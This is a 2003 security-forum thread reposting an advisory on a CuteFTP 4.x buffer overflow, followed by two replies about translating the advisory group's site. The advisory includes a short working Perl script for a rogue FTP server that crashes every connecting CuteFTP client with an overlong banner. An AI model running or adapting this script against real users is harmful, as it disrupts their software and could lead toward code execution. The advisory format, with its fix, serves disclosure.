Cute FTP buffer overflow exploit

Networking/Security Forums -> Exploits // System Weaknesses

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Sun Jan 05, 2003 8:42 pm    Post subject: Cute FTP buffer overflow exploit
    ----
Damage Hacking Group security advisory www.dhgroup.org

Product: CuteFTP client
Authors: GlobalSCAPE Inc. [www.globalscape.com]
Vulnerable versions: v.4.*
Vulnerability: buffer overflow


Overview

"CuteFTP is a Windows based File Transfer Protocol (FTP) client that
allows users to utilize the capabilities of FTP without having to
know all the details of the protocol itself. CuteFTP simplifies FTP
by offering a user-friendly Windows interface instead of a cumbersome
command line utility. CuteFTP gives novice PC users the ability to
upload, download and edit files on remote FTP servers around the world."

Problem

It's possible to crash CuteFTP (and run shellcode(?)) by sending
long (>2048b) ftp-banner to it. As u understand, this problem could
be used by FTP server.

Fix
Download new verion from www.globalscape.com.

Exploit

#!/usr/bin/perl

#Here is an example of ftp-server. It will freeze each
#CuteFTP-user, that try to connect to it.

use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981

Author: flwLocation: U.S.A. PostPosted: Sun Jan 05, 2003 10:31 pm    Post subject:
    ----
Quote:
Damage Hacking Group security advisory www.dhgroup.org


For the few of us that are a bit rusty in our Russian/Slovak skills Very Happy is there a English version or a similar site in english?

Author: ComSec PostPosted: Sun Jan 05, 2003 10:56 pm    Post subject:
    ----
translate to english from here

http://www.worldlingo.com/products_services/worldlingo_translator.html

just tested it ....works ok



Networking/Security Forums -> Exploits // System Weaknesses


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group